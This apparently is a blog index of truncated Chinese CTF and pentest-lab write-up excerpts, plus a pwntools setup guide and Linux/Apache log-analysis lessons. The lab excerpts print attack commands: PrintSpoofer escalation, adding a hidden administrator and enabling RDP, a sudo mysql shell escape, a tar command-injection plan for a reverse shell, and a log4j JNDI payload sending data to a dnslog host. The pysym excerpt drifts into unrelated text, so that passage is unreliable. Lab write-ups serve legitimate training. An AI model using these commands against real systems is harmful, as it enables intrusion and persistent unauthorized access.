CTFHUB leak canary wp一、canaryCanary(金丝雀)是一种用来检测程序中栈溢出漏洞的保护机制。 想象一下矿工带着金丝雀下矿。金丝雀对有毒气体非常敏感,如果矿井里有毒气体泄漏,金丝雀会先死去,从而提醒矿工撤离,保护矿工的安全。
在计算机安全领域,Canary 的作用类似:
在函数调用之前,在栈上放置一个随机的“金丝雀”值。 这个值是程序在运行过程中随机生成的,攻击者很难猜到。
在函数返回之前,检查栈上的“金丝雀”值是否被改变。 如果发生了栈溢出,攻击者很可能覆盖了栈上的金丝雀值。
如果“金丝雀”值被改变,说明可能发生了栈溢出。 此时,程序会立即终止,防止攻击者利用栈溢出执行恶意代码。
简单来说,Canary就像一个陷阱:
陷阱: 金丝雀值。触发陷阱的条件: 栈溢出,导致金丝雀值被覆盖。后果: 程序终止,防止恶意攻击。
二、解题思路静态分析先使用file以及checksec命令查看一下文件信息
32位的elf文件
使用ida32打开分析
main函数很简单,调用了vuln()函数,接着跟进vuln()函数
这里存在两个漏洞
一个明显的栈溢出 ...
Ubuntu下安装pwntools的详细教程最近新安装了一个ubuntu的22.04版本的虚拟机,但是环境的配置有点麻烦
环境
VMware® Workstation 17 ProUbuntu 22.04.5python 3.8.5
一、准备执行所有升级
sudo apt-get updatesudo apt-get upgrade -y
安装编译Python源程序所需要的包
sudo apt install build-essential -ysudo apt install libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev -ysudo apt-get install zlib1g-dev
二、python配置到python的官网下载一个源码包,推荐到清华的镜像站下载
我下载的是python3.8.5,因为我自己本地的环境是3.8.5,在调试的时候也方便,如果觉得麻烦也可以通过我提供的网盘下载
[python3.8.5]: http://113.45.36. ...
春秋云镜Tsclient一、简介
二、flag01打开环境,探测端口
fscan扫描发现mssql服务开启
使用mdtu连接上去,先激活xpcmdshell,再执行命令,得到当前用户是mssqlserver
接下来用土豆提权,使用几个土豆都报错,最后使用PrintSpoofer提权成功
PrintSpoofer64.exe -c -i cmd
接下来肯定是要添加上一个管理员用户并打开3389端口,方便后面远程桌面连接上去
net user myiiing qwer1234! /addnet localgroup administrators myiiing /addREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
flag01在Adminstrator文件夹下面
二、flag02三、flag03
春秋云镜 Initial一、靶标介绍
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
二、渗透阶段一、flag01用fscan扫描一下,发现80端口是开放的且存在一个rce漏洞
fscan.exe -h ip
使用ThinkPHPGUI工具传马上去
使用蚁剑连接上去,接下来是提权
先看看sudo -l有没有什么可以用的,发现一个mysql可以提权,使用mysql提权
sudo -lsudo mysql -e '\! id'sudo mysql -e '\! cat /root/flag/flag01.txt'
成功拿到第一段flag
flag01: flag{60b53231-
二、flag02传一个fscan上去扫一下内网
先看一下ip
ifconfig
接着用刚才传上去的fscan扫描一下
chmod +x ./fscan./fscan -h 172.22.1.15/24cat result.txt
从中 ...
[CISCN 2023 华北]pysym wp一、源码分析经过浏览源码可知
os.system(‘tar --absolute-names -xvf {} -C {}’.format(savepath,directory))
这一行代码,当解压的时候,可以利用管道符 | 去拼接我们的命令
首先检查上传文件是否为空以及文件大小,对文件名进行路径拼接,然后给出上传成功后随机的文件路径,try命令执行tar解压文件,这里存在RCE漏洞,我们可以利用|去命令执行
因为os.system是无回显的,我们尝试反弹shell除此之外,发现当savepath包含一些特殊字符时会引发file.save(savepath)报错,用base64避免
二、攻击过程
使用bp抓包,修改文件名为构造的payload,使用base64编码
这里后端验证后会返回验证结果给前端,抓到这个包我们发到重放模块
这里给前端的没有任何验证,我们前面以guest登录时的密码是对的,这里后端返回给前端的消息只有说这个用户是谁,但是后端验证后返回的验证结果中仅包含用户身份信息,而未对用户身份进行严格限制,那我们将这个包的用户名字段修改为admin的话前端就会返回admin的页面给我们
改完 ...
玄机靶场应急响应:第二章 日志分析-apache日志分析一、前言什么是apache日志分析?
apache日志一般存在 /var/log/apache2下
名称一般为access.log,其备份文件为access.log.1,包含前一天的日志
玄机靶场应急响应:第一章 应急响应-Linux日志分析一、前言什么是Linux日志分析?
Linux日志分析是指对Linux系统中生成的日志文件进行检查、监控和分析的过程。在Linux系统中,各种服务和应用程序会产生日志文件,记录系统运行状态、用户操作、系统错误、安全事件等信息。
通过分析这些日志可以帮助系统管理员理解系统的运行状况,诊断问题,并确保系统的安全和稳定运行。日志分析可以手动进行,也可以使用各种日志分析工具来自动化这一过程。
Linux系统中的日志文件通常存储在 /var/log 目录下。
常见的日志文件包括:
/var/log/syslog:记录系统的各种信息和错误。/var/log/auth.log:记录身份验证相关的信息,如登录和认证失败。/var/log/kern.log:记录内核生成的日志信息。/var/log/dmesg:记录系统启动时内核产生的消息。/var/log/boot.log:记录系统启动过程中的消息。/var/log/messages:记录系统的广泛消息,包括启动和应用程序信息。/var/log/secure:记录安全相关的消息。/var/log ...
春秋云镜 Certify 一、flag01先用fscan扫描一下
扫出来了一个 Solr 服务
Solr 是开源的,基于 Lucene Java 的搜索服务器。易于加入到 Web 应用程序中,会生成基于HTTP 的管理界面。后台管理界面Dashboard仪表盘中,可查看当前Solr的版本信息。
访问这个地址,发现是 solr8.11.0 版本,搭载了 lo4j2 组件,solr8.11.0 刚好也是能触发 log4j2 漏洞的最新版本
用 dnslog 探测一下是否存在 log4j2 漏洞
http://121.89.212.114:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.hsd11b.dnslog.cn} #hsd11b.dnslog.cn是DNSLog Get SubDomain的url
dnslog回显
在 vps 上开启 1389 和 3456 端口,然后跑一下 JNDIExploit(如果跑不起来,多半是 java 版本的问题,换成 1. ...
